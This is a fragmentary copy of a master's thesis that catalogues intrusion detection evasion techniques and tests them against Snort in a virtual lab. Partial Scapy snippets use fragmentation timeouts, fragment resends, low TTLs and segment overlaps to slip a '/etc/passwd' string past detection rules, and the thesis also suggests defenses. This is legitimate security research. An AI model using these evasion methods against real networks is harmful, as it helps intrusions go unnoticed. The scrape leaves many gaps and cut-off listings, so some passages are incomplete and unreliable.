Documente Academic
Documente Profesional
Documente Cultură
!"#$%&'()+,-./012345<yA|
M ASARYKOVA UNIVERZITA
FAKULTA INFORMATIKY
M ASTER ’ S THESIS
Vít Bukač
Vít Bukač
ii
Acknowledgement
First, I would like to thank my advisor RNDr. Vojtěch Krmíček for his valuable
suggestions and factual comments which allowed the creation of this thesis. Also
I would like to express gratitude to my family and friends for their favour and
support. Thank you.
iii
Abstract
This thesis contains the list of existing intrusion detection evasion techniques.
Several chosen techniques are implemented in the testing environment and their
fruitfulness of detection avoidance is measured.
iv
Keywords
intrusion detection, evasion, insertion, Snort, Scapy, signature, port scan, false
positive generation, STATL, ADeLe
v
Contents
1 Introduction 1
3 Attacks on IDS 15
3.1 Attack types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
3.2 Network layer evasion . . . . . . . . . . . . . . . . . . . . . . . . . . 15
3.3 Transport layer evasion . . . . . . . . . . . . . . . . . . . . . . . . . . 18
3.4 Code morphing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
3.5 Port scan detection evasion . . . . . . . . . . . . . . . . . . . . . . . 20
3.6 Denial of service attacks . . . . . . . . . . . . . . . . . . . . . . . . . 21
4 Snort IDS 24
4.1 Inner workings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
4.2 Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
4.3 Preprocessors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
4.3.1 frag3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
4.3.2 Stream5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
4.3.3 sfPortscan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
5 Attacks implementation 32
5.1 Packet level evasion . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
5.1.1 Methodology . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
5.1.2 Testing traffic . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
5.1.3 Simple fragmentation . . . . . . . . . . . . . . . . . . . . . . . 37
5.1.4 Fragment reassembly timeout . . . . . . . . . . . . . . . . . . 37
5.1.5 Fragment resend . . . . . . . . . . . . . . . . . . . . . . . . . 39
vi
5.1.6 Fragment TTL . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
5.1.7 Packet TTL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
5.1.8 Maximum transmission unit . . . . . . . . . . . . . . . . . . . 45
5.1.9 Simple segmentation . . . . . . . . . . . . . . . . . . . . . . . 46
5.1.10 Segment overlay . . . . . . . . . . . . . . . . . . . . . . . . . 47
5.2 Port scan detection evasion . . . . . . . . . . . . . . . . . . . . . . . 48
5.2.1 Methodology . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
5.2.2 No evasion technique . . . . . . . . . . . . . . . . . . . . . . . 49
5.2.3 Timing attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
5.2.4 Port scan characteristics modification . . . . . . . . . . . . . 51
5.2.5 Packet level evasion . . . . . . . . . . . . . . . . . . . . . . . 53
5.3 System administrators overwhelm . . . . . . . . . . . . . . . . . . . 55
5.3.1 Novaburn . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
5.3.2 Methodology . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
5.3.3 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
6 Conclusion 60
A ADeLe example 64
vii
List of Tables
List of Figures
viii
1 Introduction
The importance of computer networks is steadily increasing. More or less every
organization in the world is dependent to a certain degree on the existence and
the reliable function of its computer network.
Networks are under constant attacks both from hackers and the self-spreading
malware. One part of the defense is to use the intrusion detection system (IDS).
The IDS monitors activities in the network and reports any policy violations.
However IDSs are created by humans and consequently they are not unmistak-
able. Since the introduction of the concept of intrusion detection in the eight-
ies of the Twentieth Century a number of methods has been discovered which,
when applied to ordinary attacks, allow these attacks to go undetected by the IDS.
These methods are summarily called intrusion detection evasion techniques.
The goal of this thesis is to provide the list of existing intrusion detection eva-
sion techniques and demonstrate their practical use with Snort intrusion detec-
tion system as a chosen testing platform.
The thesis consists of six chapters. Chapter 2 outlines the theoretical back-
ground of intrusion detection systems. Advantages and disadvantages of vari-
ous types of intrusion detection are discussed. Chapter 3 brings a list of known
evasion techniques. Chapter 4 describes signature-based open source intrusion
detection system Snort. Chapter 5 presents test results of several chosen intru-
sion detection evasion attacks against Snort. Also basic defense measures are sug-
gested. Chapter 6 summarizes the thesis.
CD-ROM disk with an electronic copy of the thesis and with all used scripts
is added.
1
2 Intrusion detection systems
2.1 Terminology
Asset is a part of the system which is used by the organization and which has an
unomittable value.
Threat is a potential security violation.
Attack is the realization of a threat which results in decreasing of value of the
asset.
Attacker is a person executing the attack.
Victim is a computer which is a target of the attack.
False positive is the erroneous identification of the harmless event as harmful.
False negative is the erroneous identification of the harmful event as harmless.
2
2. I NTRUSION DETECTION SYSTEMS
3
2. I NTRUSION DETECTION SYSTEMS
4
2. I NTRUSION DETECTION SYSTEMS
5
2. I NTRUSION DETECTION SYSTEMS
• Inability to detect new attacks Attacks for which signatures do not exist
yet cannot be detected.
An important functional aspect of IDSs is the set of signatures which is used for
detection. Commercial IDSs often keep basic rule set secret and companies them-
selves are primary sources of rules. Such signatures are tested in order to cause
minimum false positives and not to slow the IDS down significantly. On the other
hand many open-source IDSs benefit from the community which supplies rules
quickly and openly so as every administrator could modify them.
6
2. I NTRUSION DETECTION SYSTEMS
2.5.2 STATL
State Transition Analysis Technique Language [EVK01] is a detection language
specifically designed to meet requirements which were described in section 2.5.1,
page 7. It has been developed with the intention to unify different approaches
to detection languages and allow extensibility to different domains and environ-
ments. Rules from several detection languages were discovered possible to be
transformed into STATL, most notably language of Snort [Eck01] and N-Code
used in Network Flight Recorder.
7
2. I NTRUSION DETECTION SYSTEMS
S: (S, T, s0 , I, g, q)
σ : (Ns × L × Q × E)
: τE × T × κ × ℘(E)
8
2. I NTRUSION DETECTION SYSTEMS
initial
state s1 {}
state s2 {}
state s3 {}
state s4 {
intAsser2 > intAsser1
++intCount;
log(“got %d matches”,intCount);
}
9
2. I NTRUSION DETECTION SYSTEMS
can be local and global. Global variables are shared among all instances of the
scenario, local variables hold only in actual instance.
Four states s1, s2, s3 and s4 are declared, the first being also initial. Only one
state may be declared as initial. State s4 has no exiting transition, so it is consid-
ered final. In the final state the global variable intCount is incremented and then
logged. Each state can consists of a code block, an optional annotation and an
assertion. Assertion is the entrance condition – state code block is executed if the
assertion is evaluated as True. State’s assertion is implicitly True if no assertion is
inserted. A sample assertion is given in the state s4.
There are 5 transitions named t1, t2, t3, timeout1 and timeout2. Each transi-
tion must have specified name, type and a pair of states it connects. Source and
destination states can be identical. Transition’s code block is bounded by braces.
It may perform any computation supported by STATL, but typically it is used to
copy event field values to global or local variables. Optionally the transition can
contain the annotation and the assertion.
During the change of state assertions and code blocks are processed in the fol-
lowing order:
10
2. I NTRUSION DETECTION SYSTEMS
2.5.3 ADeLe
Adele is an attack language which was designed to combine all the knowledge
available for a given attack in one and only one readable and high-level descrip-
tion. It models known attack scenarios, creating a database which can be used
for configuration of detection engines and probes and also for testing of already
established intrusion detection systems [MM01].
Adele is a combination of four types of languages – exploit, detection, correla-
tion and response. That enables to describe all aspects of an attack in the great de-
tail. Reporting capability was not involved, IDMEF [DCF07] language was used
for output purposes. We assume events are delivered in the same format.
ADeLe main properties
• Readability The description is understandable without special tools. No-
tation is similar to XML.
Headline of the attack consists of a name and optional parameters. Input param-
eters summarize information needed for the execution of an attack and output
parameters denote the gain of an attacker (e.g. level of access obtained, informa-
tion gathered etc.). Attacks themselves are described in three separate fields – the
exploit part, the detection part and the response part.
<EXPLOIT>
<PRECOND>
</PRECOND>
<ATTACK> <LANG> </LANG>
</ATTACK>
<POSTCOND>
</POSTCOND>
</EXPLOIT>
11
2. I NTRUSION DETECTION SYSTEMS
Exploit part describes an attack from the attacker’s point of view. Precondition
section contains requirements for launching an attack (e.g. certain vulnerability is
present on the target host). Attack section provides the source code of the attack.
Language of the code is specified in the <LANG> tag. Adele puts no limitation
on what code/exploit languages can be used (e.g. C++ [Jos99], Perl [Foy07], Nasl
[Arb05], . . . ). Attack section is important because some parts of it are later refer-
enced in the detect section as an unique identification of the attack in progress.
Postcondition section stores the information about attacker’s gains.
<DETECTION>
<DETECT>
<EVENTS>
</EVENTS>
<ENCHAIN>
</ENCHAIN>
<CONTEXT>
</CONTEXT>
</DETECT>
<CONFIRM>
</CONFIRM>
<REPORT>
</REPORT>
</DETECTION>
Detection part describes the attack as an observation made on target host. ADeLe
uses own high-level language to express the detection of attacks. Events subsec-
tion contains names of events and alerts which are observable during the attack
written in IDMEF format. These events should be already mentioned in the attack
section of the exploit part.
Enchain subsection describes temporal relationships between events. Rela-
tionships are relative. Events can be in sequence, non-ordered (meaning, they
must all occur, but no matter the sequence), one among many (only one event
from the set of events must occur), subset of (several events from the set of events
must occur), repeated (single event with multiple occurrences) or non occurrence
(certain event must not occur). Timeouts can also be specified which can invali-
date the tracking of an attack.
Context subsection describes contextual aspects of a scenario. A context rule
is a constraint applied to occurrences of one or more of previously defined events
or alerts. All constraints must be satisfied simultaneously. Constraints can be ex-
pressed on any field to filter only events / alerts that should appear for a given
attack. Constraints can be based on the comparison of values, the occurrence of a
certain value in the field of values, locating of a substring within a string etc.
Each event has at least six fields: AlertId (serial number of the event), Time
(time of the generation of the event), Analyzer.ident (an identifier of the probe
which has produced the event), Classification[0].name (name used to refer to this
kind of the event), Target (a field of information about the target of the event) and
12
2. I NTRUSION DETECTION SYSTEMS
Source (a field of information about the source of the event). There are many more
fields which allow access to low-level information contained in events. Each field
can be accessed via the dot notation from the higher level. Top level objects are
classes of observed events. Three classes are currently defined: System, Network
and Appli . For example the source address value of the packet which caused an
event can be accessed:
Network.Ip.Header.src
Confirm subsection contains checks to verify if the attack was successful. This
way the false positives rate can be decreased. Examples of checks are computing
hashes of sensitive files or pinging hosts which were targets of denial-of-service
attack.
Report section constructs an alert to be sent. Section uses IDMEF notation.
<RESPONSE>
</RESPONSE>
Response section lists automatic reaction which would be executed when the at-
tack was detected. Examples of reactions are modifications of firewall rules, TCP
session reset, launch of a script etc.
13
2. I NTRUSION DETECTION SYSTEMS
• Lower lucidity Rules and decision trees are more complicated to under-
stand, harder to modify and more demanding to be accurate.
14
3 Attacks on IDS
• Maximum transmission unit MTU value specifies the size of the biggest
15
3. ATTACKS ON IDS
16
3. ATTACKS ON IDS
packet which can be routed through the interface with the given data-link
layer protocol (e.g. Ethernet has a MTU of 1500 B). Attacker can learn the
lowest MTU value between him and the target host by the technique called
“path MTU discovery”. If this minimum is between the IDS and the target
host (or between the target host and the point where IDS is connected to
the network) then the attacker can create packet with size bigger than this
minimum and “Don’t fragment” bit set. Such packet will reach the IDS
but it will be discarded by the router at the beginning of the low-MTU line
which results in an IDS insertion attack.
• IP checksum verification An intrusion detection system which does not
verify IP checksum (often for performance reasons) is susceptible to an in-
sertion attack, because it may process a packet which would be discarded
at target host. IP checksum verification can be used in conjunction with
fragmentation or transport layer attacks.
• Source routing Source routing is a mechanism which allows the sender of
a packet to specify the route which the packet takes through the network.
Attacker can spoof the sender address and set it as it is from the subnet
which attacker is trying to invade. Then the source routing allows the at-
tacker to smuggle the packet into the network. Most IDSs are set up that
internal network has the higher trustfulness than the external network.
This way the attacker evades being detected by rules which suppose that
certain attacks can come only from the external network. Also routers be-
tween the IDS and the target host may be configured to drop packets with
the source routing specified. Than an insertion attack is possible [McN04].
• Fragmentation Fragmentation is a process of dissociating a large packet
into smaller units called fragments. Each fragment receives its own IP
header and can be routed through the different path.
– Reassembly Due to some ambiguities in the IP protocol specifica-
tion there are operating systems which handle specific fragmentation
cases differently. These are mostly fragment retransmission, fragment
overlays and fragments with non-neighbouring offsets. If the IDS pro-
cess fragments differently than target host it can lead to inconsisten-
cies and eventually to both insertion and evasion attacks [Nov05].
– Timeout The fragmented packet is reassembled only if all fragments
are received within the fragmentation timeout. Different timeouts’
lengths on the target host and on the IDS allow the attacker to per-
form an evasion attack [Sid05].
– TCP header division Intrusion detection systems which monitor TCP
sessions and do not perform the IP fragment reassembly can be cir-
cumvented when the attacker creates fragments so small that the TCP
header is divided into two or more parts. Each separate fragment than
does not match the signature.
17
3. ATTACKS ON IDS
• TCP options Optional header fields are specified in TCP options section
of the header.
• TCP sequence number checks Attacker sends a valid RST segment with a
sequence number out of order. Intrusion detection system which does not
18
3. ATTACKS ON IDS
• TCP session discovery Intrusion detection systems can monitor only TCP
sessions about which they have a record. A system which was unable to
detect the creation of TCP session might not able to track the session in
the future (or it might consider the traffic being bogus and ignore it). The
record is created under one of these conditions:
• TCP Time wait This is the timeout the computer should wait after closing
a session before a new session with the same source address, destination
address, source port and destination port can be opened. Different time-
outs may lead to IDS evasion, because the attacker may be able to add
packets to already closed connection which is no longer monitored by the
IDS.
• Urgent pointer flag IDS which ignores the urgent pointer is susceptible to
the evasion attack. Attacker may send a segment with urgent flag set. Such
segment should be processed in preference not in the usual order. Different
order of processing may lead to inconsistencies (e.g. in connection with
overlapping segments) [iIT06].
• Session splicing The data at higher levels are distributed among several
segments in such a way that no segment by itself matches the signature
(e.g. if IDS looks for packets which contain string “root” than one segment
might end with “ro” and the other begins with “ot”). IDS must perform
tge stream reassembly to be able to detect such attacks. Stream reassembly
is a resource-demanding operation.
19
3. ATTACKS ON IDS
• Encoding Attacker can use other than the most common ASCII encoding
for the payload of the packet (e.g Unicode [Hac]). Intrusion detection sys-
tems which do not perform the packet payload normalization are unable to
correctly interpret data and perform payload signature matching [Roea].
• Timing attacks
– Duration Port scan is spread across such period of time that the IDS
cannot hold the information about all parts of port scan. It misses
important data and is unable to detect port scans [aut].
20
3. ATTACKS ON IDS
• Distributed port scans Targets are scanned from multiple source hosts si-
multaneously.
• System administrators
21
3. ATTACKS ON IDS
• IDS flood
• Client flood An attacker sends huge amount of data to a single host which
is not able to process them all and has to discard some packets (because of
the network card saturation or the CPU exhaustion). On the other hand the
IDS is built for high performance and can process everything. This can lead
to inconsistencies. However it is difficult for the attacker to guess which
packets will be discarded. This attack is most efficient when used with
stateless protocols like UDP, otherwise the IDS can learn about discarded
packets from host’s replies.
22
3. ATTACKS ON IDS
23
4 Snort IDS
Snort is an open-source network intrusion detection/prevention system. It com-
bines the signature detection, the anomaly detection and the stateful protocol in-
spection in a single tool [BBE07]. It performs a packet-level analysis of the traffic.
The biggest advantage is a powerful packet matching ability supplied with a vast
amount of attack signatures/rules. Snort has a broad community which offers
new rules and suggests improvements every day. Three processing modes are
available:
• IDS Being typical usage, when running in this mode Snort monitors the
incoming network traffic and searches for possible intrusions.
• Logging Snort acts as a packet sniffer. Any received packets are written to
the standard output. Attack detection capabilities are disabled.
2. Packet processing The packet is obtained, decoded and checked for any
sign intrusion in the packet processing phase . Only one packet is pro-
cessed at the time.
24
4. S NORT IDS
(a) Packet acquisition Snort uses the libpcap library [lib] for packet ac-
quisition. The packet is decoded, statistical data about it is collected
and is forwarded to preprocessors.
(b) Packet decoding Different layers of the packet are identified. For each
layer a decoder is called. Data fields are separated and pointers are
created to each of them. Pointers are used for performance reasons.
As Snort is progressing up through layers it verifies validity of values
and stores all anomalies (anomalies in the meaning of protocol val-
idations not signs of attack). The output of the packet decoding is a
data structure which is passed to every available preprocessor.
(c) Preprocessing Data structure is passed to preprocessors. First it is
processed by frag3, which performs IP defragmentation, then it is
passed to Stream5 which handles transport layer stream reassembly
and finally it is passed to the appropriate application layer preproces-
sor.
(d) Detection engine Detection engine is a key part of Snort. It compares
the data structure values with all available rules. First, header part
of the packet data structure is compared with rule tree nodes. When
the match is found the data structure is compared with all option tree
nodes under the matching rule tree node. If the match is found also
among option tree nodes, the alert is generated and an information
about packet and the rule which triggered the alert is post to the log-
ging daemon.
3. Logging and alerting Logging modules are called when the attack is de-
tected and it needs to be reported.
(a) Thresholds Every time an alert is generated it is compared to thresh-
old limits. Thresholds allow limiting the number of events which are
triggered by a packet. They can be used to prevent denial-of-service
attacks on system administrators. There are two types of limits which
can be also combined. First, indicated by limit keyword, specifies
the timeout which has to pass before the same alert can be generated
again. Adding following line to the rule definition causes the alert
to be generated at most once in 60 seconds for every unique source
address:
threshold: type limit, track by_src, count 1,
seconds 60;
Second, indicated by threshold keyword, specifies the number of
alerts which must be generated by a single rule before they are passed
to the logging engine. Adding following line to the rule definition
causes the alert to be generated if the match was found at least 5 times
in the last 60 seconds for the same destination address:
threshold: type threshold, track by_dst, count 5,
seconds 60;
25
4. S NORT IDS
(b) Event queue Each alert is added to the event queue. Detection phase
stops when the queue is full or all rules have been checked. Then the
queue is examined and is decided which alerts should be logged. By
default up to three events from the queue are chosen to be logged.
Events are chosen by the longest content match. These parameters
can be changed in event_queue section of snort.conf file.
4.2 Rules
Snort uses lightweight rules language which is easy to understand. Rules de-
scribe conditions or state and any action to be taken when that conditions or state
are seen. They have two distinct sections, the rule header and the rule options.
Header part has strictly defined structure whether options part is much more
variable. Options part is closed in parentheses. Rule matches the packet if all con-
ditions described both in the header and in the options are satisfied [Sou10]. In
general the rule has the following syntax:
action protocol src_ip src_port -> dst_ip dst_port \
(rule_options)
Action describes Snort’s reaction when match for the rule is found in processed
packets. In the IDS mode there are five possible actions: alert (an alert is gener-
ated and packet is logged), pass (packet is ignored), log (packet is logged), ac-
tivate (generate alert and pass to the dynamic rule) and dynamic (remain idle
until activated by an activate rule, then act as a log rule). When running Snort in
inline mode another three actions are available: drop (packet is logged and then
dropped by iptables), reject (packet is logged, dropped and the sender is notified)
and sdrop (packet is dropped without being logged).
Currently TCP, UDP, ICMP and IP protocols are supported. Support for higher
level protocols is added by preprocessors.
Variables src_ip and dst_ip represent the source and the destination of the
packet. Values can be either single IP addresses or address ranges in CIDR no-
tation; no support for DNS is included. Any combination of the packet’s source
IP address belonging to src_ip range and of the packet’s destination IP address
belonging to dst_ip satisfies the condition. The negation operator can tell Snort
to match any IP address except those indicated. Keyword “any” can be used to
represent any IP address.
Port numbers can be expressed using ranges, “any” keyword, negation oper-
ator or static port definitions (e.g. telnet for port 22). Ranges are indicated with
“:” operator.
alert ip ![192.168.0.1/24,192.168.0.2/24] \
any -> any 1:30 ()
The options part of the rule can contain dozens of different conditions and prop-
erties. I shall mention only some of the most important.
26
4. S NORT IDS
SID is an unique numeral rule identifier. Every rule must have one. Numbers 0
to 100 are reserved for future purposes. Numbers from 100 to 1,000,000 are given
to the common Snort rule set. Greater numbers are intended for custom rules
which are unique in the given environment.
The priority tag assigns the security level to the rule. When processing packets
the IDS can be set to generate only alerts with a certain security level.
Probably the most important rule definition keyword is content. It allows the
administrator to set rules that search for a specific string in the packet payload.
The packet payload is parsed by the Boyer-Moore pattern matching algorithm. If
the searched string is found in the packet than the content condition is consid-
ered satisfied. Search is case sensitive. String can be specified as a sequence of
ASCII characters, as a binary data or a combination of both. Binary representa-
tion is enclosed within pipe characters. Negation operator can be used to report
packets which do not contain the string. Content keyword can be followed with
several modifiers which specify where to look for the string in the packet (off-
set, depth, rawbytes, distance, within). Also there are modifiers designed specif-
ically for searching in HTTP traffic (http_client_body, http_cookie, http_header,
http_method, http_uri).
The example presents the rule which detects any packet coming into the internal
network on port 21. This packet must belong to an already established connection
(whether the connection is established or not is decided by Stream5 preprocessor
which is described later in the chapter) and must be going from the client (the
computer which has initiated the session) to the server. In the payload the detec-
tion engine looks for pattern described by regular expression
/^USER\s+(anonymous|ftp)[^\w]*[\r\n]/s
Search is case insensitive. The rule is also assigned to the rule class “misc-activity”,
so it inherits its priority. Finally the rule is given SID 553 and is indicated that it
has been updated 9 times.
4.3 Preprocessors
A preprocessor is code that is compiled into the Snort engine upon build in or-
der to normalize traffic and/or examine the traffic for attacks in a fashion beyond
what can be done in normal rules. Snort utilizes frag3 preprocessor for the IP
defragmentation, Stream5 preprocessor for the stream reassembly and the state-
ful inspection and a collection of application layer preprocessors for the higher
protocols normalization. Preprocessors are not rule-based, but they may still gen-
erate their own alerts.
27
4. S NORT IDS
4.3.1 frag3
Frag3 enables the target-based IP defragmentation of traffic. Different IP stack
implementations perform the IP reassembly differently. The goal of frag3 is to
reassembly IP fragments in the similar way as target hosts. Also it is capable of
detecting fragment anomalies and IP packets with the low TTL value.
Frag3 is based on the concept of target-host policies. Ptacek and Newsham
identified differences between common IP stack implementations in their paper
[PN98]. These policies can be bind to particular hosts on the network thus en-
suring the fragments are processed similarly on the IDS and on the target host.
Fragmentation-based insertion and evasion attacks should be therefore made im-
possible.
Currently frag3 can follow 7 policies of IP defragmentation:
• BSD favors the original fragment with an offset that is less than or equal
to the subsequent fragment.
• BSD-right favors the subsequent fragment when the original fragment has
an offset that is less than or equal to the subsequent one.
• Linux favors the original fragment with an offset that is less than the sub-
sequent fragment.
• Solaris favors an offset smaller than the original fragment and ends at an
offset equal to or greater than the original fragment’s offset. Otherwise, the
Solaris policy favors the fragment that arrived first.
2. Teardrop attack
5. Zero-byte fragment
28
4. S NORT IDS
8. Fragmentation overlap
11. TTL value less than configured minimum, not using for reassembly
4.3.2 Stream5
Stream5 enables the target-based TCP stream reassembly. Without the stream re-
assembly attacks which are divided among multiple packets cannot be detected.
Stream5 extracts the payload of each packet and reconstructs the data flow.
As in case of the IP defragmentation, stream reassembly is not strictly defined.
Ambiguities exist between common implementations. Particularly handling of
overlapping segments is questionable. Stream5 can be directed to use specific
reassembly policies for each observed IP address. Judy Novak and Steve Sturges
present all possibilities of the TCP stream reassembly in their paper “Target-Based
TCP Stream Reassembly” [NS07]. They identified 6 different approaches which
are used in current operating systems:
• Windows and BSD favor the original segment, except when the subse-
quent segment begins before the original segment.
• Linux favors the original segment, except when the subsequent segment
begins before the original segment, or the subsequent segment begins the
same and ends after the original segment.
• Solaris favors the subsequent segment, except when the original segment
ends after the subsequent segment, or begins before the original segment
and ends the same or after the original segment.
29
4. S NORT IDS
• Linux-old favors the subsequent segment, except when the original seg-
ment begins before, or the original segment begins the same and ends after
the subsequent segment.
30
4. S NORT IDS
Global settings orders to monitor TCP sessions. For the 192.168.1.0/24 subnet
IDS uses the windows policy and reports any TCP stream reassembly anomalies it
encounters. Furthermore TCP sessions are considered established only if all parts
of the three-way handshake (SYN, ACK+SYN and ACK segments) are received.
Stream reassembly is performed only on ports 21, 22, 23 and 25. Overlapping
TCP packets reached warning is generated if more than 3 segments overlap in
the stream.
4.3.3 sfPortscan
This preprocessor is designed to detect attacks during reconnaissance phase of an
intrusion attempt. It can detect many types of port scans, primarily SYN scans,
FIN scans and ACK scans. SfPortscan alerts are set to be generated only once in a
certain time period to prevent overwhelming [RNH]. Three sensitivity levels are
available:
• High Similar method as at Medium sensitivity level is used with the time
window of 600 seconds.
31
5 Attacks implementation
Following methods of the intrusion detection evasion are limited to the network
layer and to the transport layer of the ISO OSI model. The goal is to describe
general procedures which are not application-specific.
Testing network topology
All attacks were implemented in the virtual environment of VirtualBox 3.1.4 which
was running on a computer with Core2 Duo T9400 2.53GHz processor, 2 GB RAM
and HW virtualization enabled. Separate virtual machines were created for an
attacker’s computer, a router and a target host. Testing network topology is pre-
sented on Figure 5.1. The target host offers services to hosts in the network. That
is simulated by the netcat tool running in listening mode on a certain port:
netcat -l -p port_number
The attacker sends packets which she generated in the Scapy utility to this port.
To prevent TCP sessions being resetted by the attacker’s operating system the
attacker modifies iptables firewall so it drops outgoing RST packets:
Snort is installed on the router. It listens on both interfaces and writes its output
on the console:
Stream5, frag3 and sfPortscan preprocessors are active. For monitoring purposes
Wireshark packet sniffer is installed on all involved machines.
32
5. ATTACKS IMPLEMENTATION
1. The packet has a certain string in its payload. This is indicated by the pres-
ence of content keyword in the signature definition.
5.1.1 Methodology
Four new signatures were created as a measurement of success of attacks.
# IP packet payload - A1
alert ip $EXTERNAL_NET any -> $HOME_NET any \
(msg:"A1 - IP, string"; \
content:"/etc/passwd"; sid:1100001;)
# Established connection - A3
alert tcp $EXTERNAL_NET any -> $HOME_NET any \
(msg:"A3 - TCP, flow"; flow:established; sid:1100003;)
33
5. ATTACKS IMPLEMENTATION
tion. As a result the listening netcat tool shows string “/etc/passwd” and then
closes itself.
Attacker produces seven packets designated A to G:
A. Packet with SYN TCP segment which begins the 3-way handshake.
B. Packet with ACK TCP segment which confirms the creation of the session.
This packet is sent after SYN+ACK segment from the victim is received.
F. Packet with FIN+ACK TCP segment which initiates the termination of the
session.
G. Packet with ACK segment which confirms the termination of the session.
This packet is sent after FIN+ACK segment from the victim is received.
A. None
B. A3
C. A1, A2, A4
D. A3
E. A3
F. A3
G. None
The goal of the attacker is to deliver the string “/etc/passwd” to the listening ap-
plication on the victim without being detected by the intrusion detection system
which has access to all exchanged packets. Snort and preprocessors use default
configuration if not stated otherwise. Evasion technique was evaluated being suc-
cessful if all these conditions were satisfied at once:
• Victim host writes a string which contains “/etc/passwd” as its netcat out-
put.
34
5. ATTACKS IMPLEMENTATION
• The TCP session between the attacker’s computer and the victim can be
terminated correctly after the attack.
Evasion technique was evaluated as a partial success if the attack was somehow
detected but inconclusively, typically by observing a rare side effect.
35
5. ATTACKS IMPLEMENTATION
9. ip = IP(src="10.0.1.2",dst="10.0.2.5")
36
5. ATTACKS IMPLEMENTATION
37
5. ATTACKS IMPLEMENTATION
18.1 timeout = 150 # 64s (WinXP) < 150s < 180s (frag3)
18.2 first = fragment(ip/PUSH/“/xxx/passwd“,fragsize=24)
18.3 second = fragment(ip/PUSH/“/etc/passwd“,fragsize=24)
18.4 send(first[0],inter=timeout) # send after timeout
18.5 send(first[1])
18.6 send(second[0])
IDS receives /xxx, after 150 seconds it receives /passwd and completes the
packet. Victim receives /xxx, drops it and then receives /etc and /passwd
which it completes into the full /etc/passwd payload. Fragment /etc remains
in the IDS’s buffer.
38
5. ATTACKS IMPLEMENTATION
because of the latency of the intermediate network. The effective defensive mea-
sure is to remove packet fragments from the internal network completely. This
can be achieved by putting a node in the network which performs IP defragmen-
tation of all passing traffic.
39
5. ATTACKS IMPLEMENTATION
In case of the Windows client and Linux frag3 policy the attack was not detected
primarily because the first segment contains a TCP header checksum field with an
incorrect value (checksum was calculated for /etc/passwd payload yet the ac-
tual payload of the packet defragmented on the IDS is /XXX/passwd). Hence the
C packet did not even generated the A3 alert. TCP checksum verification of pack-
ets can be disabled in the checksum_mode directive in snort.conf file. If so, alerts
A1, A2 and A4 would not be generated because of the wrong payload. The case
with the Debian client and the Windows policy is similar with /etc/passwd
and /etc/XXXXXX payloads.
This attack can be effective if used properly. Although Fragmentation overlap
warning was generated during every attempt, it is quite common in the real envi-
ronment and possibly it would be ignored by network administrators. Fragment
40
5. ATTACKS IMPLEMENTATION
resend can be used to alter the TCP header. Typically the attacker may force the
IDS to see a different port then what is actually used.
Frag3 provides some defense measures but its utilization is problematic. The
mapping between IP addresses and operating systems has to be done manually
by an operator. Settings are made in snort.conf file which is typically loaded dur-
ing the start of Snort so the change in configuration is not fallout-free. The frag3
solution is insufficient in real environments where hosts often change (typically
network segments which use DHCP and are intended for connections of note-
books) and for hosts behind NAT.
Umesh Shankar and Vern Paxson proposed a solution for this problem in their
paper “Active Mapping: Resisting NIDS Evasion Without Altering Traffic” [SP].
They implemented a Perl script which scans the network and for each host deter-
mines its characteristics. Discovered attributes are hop count, path MTU, whether
TCP RST packet is accepted only within receiver’s window, IP defragmentation
policy and TCP reassembly policy. These attributes then allow an automatic con-
figuration of frag3 and Stream5 preprocessors.
The bogus fragment and the real fragment have to have the same length of pay-
load.
This attack is quite simple and also quite effective. Attacker can discover the dis-
tance in hops to the victim by the ping scan. Even if the IDS is not accessible from
41
5. ATTACKS IMPLEMENTATION
the external network there is a decent chance the attack will be successful if the
TTL field is set to the hop count value decreased by one. Several ways of defense
exist. Frag3 itself enables to set the target-based low TTL bound of fragments.
Any fragments with the TTL value equal to or lower than the threshold are not
checked for intrusions. Another method is to perform a traffic normalization of
packets coming into the network or even an IP defragmentation. Fragments with
significantly low TTL values can be either dropped or their TTLs might be in-
creased. Simplest solution is to deploy multiple probes in the network so as at
least one is placed in each subnet where possible targets are.
4. payload1 = "/etc"
5. payload2 = "xxxxxxx"
6. payload3 = "/passwd"
7. attacker_mod1 = 0
8. attacker_mod2 = -7
22.1 ip.ttl = 1
22.2 send(ip/PUSH/payload2)
22.3 ip.ttl = 64
Stream5 anomaly detection generates warning “Bad segment, adjusted size <=0”
for the second segment. The second segment is 7 bytes long while the third seg-
ment is shifted by 7 bytes to the beginning of the data stream. The warning is
42
5. ATTACKS IMPLEMENTATION
4. payload1 = "/etc"
5. payload2 = "xxxxxxx"
6. payload3 = "/passwd"
7. attacker_mod1 = -3
8. attacker_mod2 = -4
22.1 ip.ttl = 1
22.2 send(ip/PUSH/payload2)
22.3 ip.ttl = 64
First 3 bytes of the second segment are put under the first segment; remaining 4
bytes are overwritten by the third segment. Stream5 anomaly detection generates
warning “Limit on number of overlapping TCP packets reached” for the second
segment. IDS reassembles the traffic with its Linux policy as /etcxxxxswd.
C. Alternative packet payload III
The previous attack modification only led to the change of the generated warning.
Another modification extends the second segment so it is not overwritten by the
third.
4. payload1 = "/etc"
5. payload2 = "xxxxxxxxxx"
6. payload3 = "/passwd"
7. attacker_mod1 = 0
8. attacker_mod2 = -10
22.4 ip.ttl = 1
22.5 send(ip/PUSH/payload2)
22.6 ip.ttl = 64
The third segment overwrites first 7 bytes of the second segment. Bad segment
warning is not generated because the whole second segment is not overwritten.
Overlap limit reach warning is not generated because only one overlap between
segments two and three is in place. IDS follows the Linux policy and reassembles
the traffic as /etcxxxxxxxxxx.
Marks D1 and D64 designate packets with TTL equal 1 and 64 respectively.
Warnings may indicate outgoing attack but in the real environment warnings are
quite common and would probably be ignored by security administrators.
